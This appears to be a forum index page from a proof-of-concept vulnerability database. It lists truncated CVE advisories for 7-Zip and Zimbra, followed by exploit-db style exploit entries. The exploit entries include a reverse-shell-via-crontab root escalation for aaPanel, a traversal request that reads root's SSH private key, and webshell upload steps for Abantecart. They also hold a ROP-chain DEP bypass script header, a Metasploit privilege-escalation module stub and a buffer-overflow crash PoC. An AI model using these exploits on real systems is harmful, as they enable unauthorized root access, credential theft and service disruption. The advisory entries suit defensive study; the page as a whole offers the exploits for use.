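?day POC Vulnerability Database
POC vulnerability database, containing all CVEs, POCs and ?day from across the web in recent years. It can be connected to the ishack vulnerability scanner via API; some vulnerabilities are visible to members only.
45,352 topics in this forum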
7-Zip: CVE-2023-40481: CWE-787 Severity 7 CVSS (AV:L/AC:L/Au:N/C:C/I:C/A:C) Published 05/03/2024 Created 12/20/2024 Added 12/19/2024 Modified 12/19/2024 Description 7-Zip SquashFS File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of 7-Zip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SQFS files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past t…
- 0 replies
- 5 views
7-Zip: CVE-2023-52168: Heap-based Buffer Overflow Severity 7 CVSS (AV:L/AC:L/Au:N/C:C/I:C/A:C) Published 07/03/2023 Created 07/31/2024 Added 07/30/2024 Modified 07/31/2024 Description The NtfsHandler.cpp NTFS handler in 7-Zip before 24.01 (for 7zz) contains a heap-based buffer overflow that allows an attacker to overwrite two bytes at multiple offsets beyond the allocated buffer size: buffer+512*i-2, for i=9, i=10, i=11, etc. Solution(s) 7-zip-7-zip-upgrade-latest References https://attackerkb.com/topics/cve-2023-52168 CVE - 2023-52168 https://nvd.nist.gov/vuln/detail/CVE-2023-52168 https://www.7-zip.org/download.html
- 0 replies
- 5 views
7-Zip: CVE-2023-52169: Buffer Over-read Severity 7 CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C) Published 07/03/2023 Created 07/31/2024 Added 07/30/2024 Modified 07/31/2024 Description The NtfsHandler.cpp NTFS handler in 7-Zip before 24.01 (for 7zz) contains an out-of-bounds read that allows an attacker to read beyond the intended buffer. The bytes read beyond the intended buffer are presented as a part of a filename listed in the file system image. This has security relevance in some known web-service use cases where untrusted users can upload files and have them extracted by a server-side 7-Zip process. Solution(s) 7-zip-7-zip-upgrade-latest …
- 0 replies
- 10 views
7-Zip: CVE-2024-11477: CWE-191 Severity 7 CVSS (AV:L/AC:L/Au:N/C:C/I:C/A:C) Published 11/22/2024 Created 11/26/2024 Added 11/25/2024 Modified 12/19/2024 Description 7-Zip Zstandard Decompression Integer Underflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of 7-Zip. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the implementation of Zstandard decompression. The issue results from the lack of proper validation of user-supplied data, which can res…
- 0 replies
- 9 views
7-Zip: CVE-2024-11612: CWE-835 Severity 8 CVSS (AV:N/AC:L/Au:N/C:N/I:N/A:C) Published 11/22/2024 Created 11/26/2024 Added 11/25/2024 Modified 12/19/2024 Description 7-Zip CopyCoder Infinite Loop Denial-of-Service Vulnerability. This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of 7-Zip. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the processing of streams. The issue results from a logic error that can lead to an infinite loop. An attacker can leverage this vulnerability t…
- 0 replies
- 9 views
7-Zip: CVE-2025-0411: CWE-693 Severity 6 CVSS (AV:L/AC:H/Au:N/C:C/I:C/A:C) Published 01/25/2025 Created 01/30/2025 Added 01/29/2025 Modified 02/13/2025 Description 7-Zip Mark-of-the-Web Bypass Vulnerability. This vulnerability allows remote attackers to bypass the Mark-of-the-Web protection mechanism on affected installations of 7-Zip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of archived files. When extracting files from a crafted archive that bears the Mark-of-the-Web, 7-Zip does not propagate the Mark-of-the-Web …
- 0 replies
- 26 views
A Cross-Site Scripting (XSS) issue that allowed an attacker to inject and execute malicious code via email account configurations has been resolved. Severity 5 CVSS (AV:N/AC:L/Au:M/C:P/I:P/A:N) Published 11/21/2024 Created 01/16/2025 Added 01/10/2025 Modified 01/20/2025 Description In Zimbra Collaboration (ZCS) 9.0 and 10.0, a vulnerability in the Webmail Modern UI allows execution of stored Cross-Site Scripting (XSS) payloads. An attacker with administrative access to the Zimbra Administration Panel can inject malicious JavaScript code while configuring an email account. This injected code is stored on the server and executed in the context of the …
- 0 replies
- 9 views
A Cross-Site Scripting (XSS) vulnerability caused by a non-sanitized `packages` parameter has been resolved. Severity 5 CVSS (AV:N/AC:L/Au:S/C:P/I:P/A:N) Published 11/21/2024 Created 01/16/2025 Added 01/10/2025 Modified 01/20/2025 Description An issue was discovered in Zimbra Collaboration (ZCS) through v10.1. A Cross-Site Scripting (XSS) vulnerability exists in one of the endpoints of Zimbra Webmail due to insufficient sanitization of the packages parameter. Attackers can bypass the existing checks by using encoded characters, allowing the injection and execution of arbitrary JavaScript within a victim's session. Solution(s) zimbra-co…
- 0 replies
- 10 views
A Cross-Site Scripting (XSS) vulnerability in TinyMCE was addressed in the upgrade from version 7.1.1 to 7.2.0 Severity 6 CVSS (AV:N/AC:L/Au:N/C:P/I:P/A:N) Published 01/20/2025 Created 01/16/2025 Added 01/20/2025 Modified 01/20/2025 Description TinyMCE is an open source rich text editor. A cross-site scripting (XSS) vulnerability was discovered in TinyMCE’s content extraction code. When using the `noneditable_regexp` option, specially crafted HTML attributes containing malicious code were able to be executed when content was extracted from the editor. This vulnerability has been patched in TinyMCE 7.2.0, TinyMCE 6.8.4 and TinyMCE 5.11.0 LTS by ensur…
- 0 replies
- 11 views
A cross-site scripting (XSS) vulnerability that was present in the Zimbra Classic Web Client has been addressed. Severity 6 CVSS (AV:N/AC:L/Au:N/C:P/I:P/A:N) Published 07/31/2023 Created 01/24/2024 Added 01/23/2024 Modified 01/20/2025 Description Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client. Solution(s) zimbra-collaboration-upgrade-latest References https://attackerkb.com/topics/cve-2023-37580 CVE - 2023-37580 https://wiki.zimbra.com/wiki/Security_Center https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy http://www.openwall.com/lists/oss-security/2023…
- 0 replies
- 8 views
A Cross-Site Scripting (XSS) vulnerability via crafted <img> HTML content in the Zimbra Classic UI has been fixed. LC attribute zimbra_owasp_strip_alt_tags_with_handlers introduced in previous patch is no longer required and has been removed. Severity 8 CVSS (AV:N/AC:L/Au:N/C:N/I:C/A:N) Published 01/20/2025 Created 01/16/2025 Added 01/20/2025 Modified 01/20/2025 Description No document with this CVE id exists in the DB. Solution(s) zimbra-collaboration-upgrade-latest References https://attackerkb.com/topics/cve-2024-45516 CVE - 2024-45516
- 0 replies
- 15 views
A Local File Inclusion (LFI) vulnerability in the /h/rest endpoint, allowing authorized remote attackers to access sensitive files in the WebRoot using their valid auth tokens, has been fixed to prevent unauthorized file access. Severity 8 CVSS (AV:N/AC:L/Au:N/C:C/I:N/A:N) Published 12/19/2024 Created 01/16/2025 Added 01/10/2025 Modified 01/20/2025 Description An issue was discovered in the Webmail Classic UI in Zimbra Collaboration (ZCS) 9.0 and 10.0 and 10.1. A Local File Inclusion (LFI) vulnerability exists in the /h/rest endpoint, allowing authenticated remote attackers to include and access sensitive files in the WebRoot directory. Exploitation…
- 0 replies
- 14 views
A possible Cross-site Scripting (XSS) security vulnerability has been fixed Severity 9 CVSS (AV:N/AC:L/Au:S/C:C/I:C/A:C) Published 07/06/2023 Created 01/16/2025 Added 01/10/2025 Modified 01/20/2025 Description Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function. Solution(s) zimbra-collaboration-upgrade-latest References https://attackerkb.com/topics/cve-2023-34192 CVE - 2023-34192 https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories https://wiki.zimbra.com/wiki/Security_Center https://wiki.zimbra.…
- 0 replies
- 11 views
A reflected XSS vulnerability in the calendar endpoint has been addressed. Severity 6 CVSS (AV:N/AC:L/Au:N/C:P/I:P/A:N) Published 11/07/2024 Created 01/16/2025 Added 01/10/2025 Modified 01/20/2025 Description A reflected Cross-Site Scripting (XSS) vulnerability has been identified in Zimbra Collaboration Suite (ZCS) 8.8.15, affecting one of the webmail calendar endpoints. This arises from improper handling of user-supplied input, allowing an attacker to inject malicious code that is reflected back in the HTML response. Solution(s) zimbra-collaboration-upgrade-latest References https://attackerkb.com/topics/cve-2024-50599 C…
- 0 replies
- 10 views
A security related issue has been fixed which impacted one of the third party libraries being used in Admin User Interface. Severity 5 CVSS (AV:N/AC:L/Au:N/C:N/I:N/A:P) Published 01/20/2025 Created 01/16/2025 Added 01/20/2025 Modified 01/21/2025 Description This affects the package chart.js before 2.9.4. The options parameter is not properly sanitized when it is processed. When the options are processed, the existing options (or the defaults options) are deeply merged with provided options. However, during this operation, the keys of the object being set are not checked, leading to a prototype pollution. Solution(s) zimbra-collaboratio…
- 0 replies
- 17 views
A Server-Side Request Forgery (SSRF) vulnerability that allowed unauthorized access to internal services has been addressed. Severity 7 CVSS (AV:N/AC:H/Au:S/C:C/I:C/A:C) Published 10/22/2024 Created 01/16/2025 Added 01/10/2025 Modified 01/21/2025 Description An issue was discovered in Zimbra Collaboration (ZCS) 10.1.x before 10.1.1, 10.0.x before 10.0.9, 9.0.0 before Patch 41, and 8.8.15 before Patch 46. It allows authenticated users to exploit Server-Side Request Forgery (SSRF) due to improper input sanitization and misconfigured domain whitelisting. This issue permits unauthorized HTTP requests to be sent to internal services, which can lead to Re…
- 0 replies
- 4 views
A stored XSS vulnerability in the `contacts/print` endpoint has been addressed. Severity 5 CVSS (AV:N/AC:L/Au:M/C:P/I:P/A:N) Published 11/21/2024 Created 01/16/2025 Added 01/10/2025 Modified 01/20/2025 Description An issue was discovered in Zimbra Collaboration (ZCS) through 10.1. A stored Cross-Site Scripting (XSS) vulnerability exists in the /modern/contacts/print endpoint of Zimbra webmail. This allows an attacker to inject and execute arbitrary JavaScript code in the context of the victim's browser when a crafted vCard (VCF) file is processed and printed. This could lead to unauthorized actions within the victim's session. Solution(…
- 0 replies
- 4 views
#!/usr/bin/python # Exploit Title: A-PDF All to MP3 Converter 2.0.0 - DEP Bypass with HeapCreate + HeapAlloc + some_memory_copy_function ROP chain # Date: 16 November 2023 # Exploit Author: George Washington # Vendor Homepage: http://www.a-pdf.com/all-to-mp3/download.htm # Software Link: http://www.a-pdf.com/all-to-mp3/download.htm # Version: 2.0.0 # Tested on: Windows 7 Ultimate 6.1.7601 SP1 Build 7601 x64 # Based on: https://www.exploit-db.com/exploits/17275 # Remarks: There are some changes to the ROP gadgets obtained from Alltomp3.exe # Video: https://youtu.be/_JEgdKjbtpI import socket, struct file = "1.wav" size = 8000 ############ Parameters for HeapCreate() ####…
- 0 replies
- 12 views
# Exploit Title: [aaPanel 6.6.6 - Authenticated Privilege Escalation] # Google Dork: [] # Date: [04.05.2020] # Exploit Author: [Ünsal Furkan Harani (Zemarkhos)] # Vendor Homepage: [https://www.aapanel.com/](https://www.aapanel.com/) # Software Link: [https://github.com/aaPanel/aaPanel](https://github.com/aaPanel/aaPanel) # Version: [6.6.6] (REQUIRED) # Tested on: [Linux ubuntu 4.4.0-131-generic #157-Ubuntu SMP Thu Jul 12 15:51:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux] # CVE : [CVE-2020-14421] if you are logged was admin; 1- go to the crontab 2- select shell script and paste your reverse shell code 3- click execute button and you are now root. because crontab.py run…
- 0 replies
- 9 views
# Exploit Title: aaPanel 6.8.21 - Directory Traversal (Authenticated) # Date: 22.02.2022 # Exploit Author: Fikrat Ghuliev (Ghuliev) # Vendor Homepage: https://www.aapanel.com/ # Software Link: https://www.aapanel.com # Version: 6.8.21 # Tested on: Ubuntu Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa) #Go to App Store #Click to "install" in any free plugin. #Change installation script to ../../../root/.ssh/id_rsa POST /ajax?action=get_lines HTTP/1.1 Host: IP:7800 Content-Length: 41 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Geck…
- 0 replies
- 12 views
# Exploit Title: Abantecart v1.3.2 - Authenticated Remote Code Execution # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) # Date: 3rd Mar'2022 # CVE ID: CVE-2022-26521 # Confirmed on release 1.3.2 # Vendor: https://www.abantecart.com/download ############################################### #Step1- Login with Admin Credentials #Step2- Uploading .php files is disabled by default hence we need to abuse the functionality: Goto Catalog=>Media Manager=>Images=>Edit=> Add php in Allowed file extensions #Step3- Now Goto Add Media=>Add Resource=> Upload php web shell #Step4- Copy the Resource URL location and execute it in the brows…
- 0 replies
- 8 views
# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information # Date: 2023-03-31 # Exploit Author: Paul Smith # Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series # Version: ABB Flow-X all versions before V4.00 # Tested on: Kali Linux # CVE: CVE-2023-1258 #!/usr/bin/python import sys import re from bs4 import BeautifulSoup as BS import lxml import requests # Set the request parameter url = sys.argv[1] def dump_users(): response = requests.get(url) # Check for HTTP codes other than 200 if response.status_code != 200: print('Status:', response.status_code, 'Headers:', response.headers, 'Err…
- 0 replies
- 9 views
Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow Date: 2019-08-13 Exploit Author: Carter Yagemann <[email protected]> Vendor Homepage: https://abcnotation.com/abc2mtex/ Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz Version: 1.6.1 Tested on: Debian Buster An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return address from the openIn function by providing a long input filename. This carries similar risk to CVE-2004-1257. Setup: $ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz $ tar -xzf abc2mtex1.6.1.tar.gz $ make $ gcc --…
- 0 replies
- 5 views
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Kernel include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'ABRT sosreport Privilege Escalation', 'Description' => %q{ This module attempts to gain root privileges on RHEL systems with a vulnerable version of Automatic…
- 0 replies
- 7 views
#Exploit Title: AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-19 #Vendor Homepage: https://www.celestialsoftware.net/ #Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet10.16.exe #Tested Version: 10.16 #Tested on: Windows 7 Service Pack 1 x64 #Steps to produce the crash: #1.- Run python code: AbsoluteTelent.py #2.- Open AbsoluteTelent.txt and copy content to clipboard #3.- Open AbsoluteTelnet.exe #4.- Select "Help" > "Enter License Key" #5.- In "License Name" paste Clipboard #6.- Crashed cod = "\x41" * 2500 f = open('AbsoluteTelent.txt', 'w') f.write(cod) f.close()
- 0 replies
- 6 views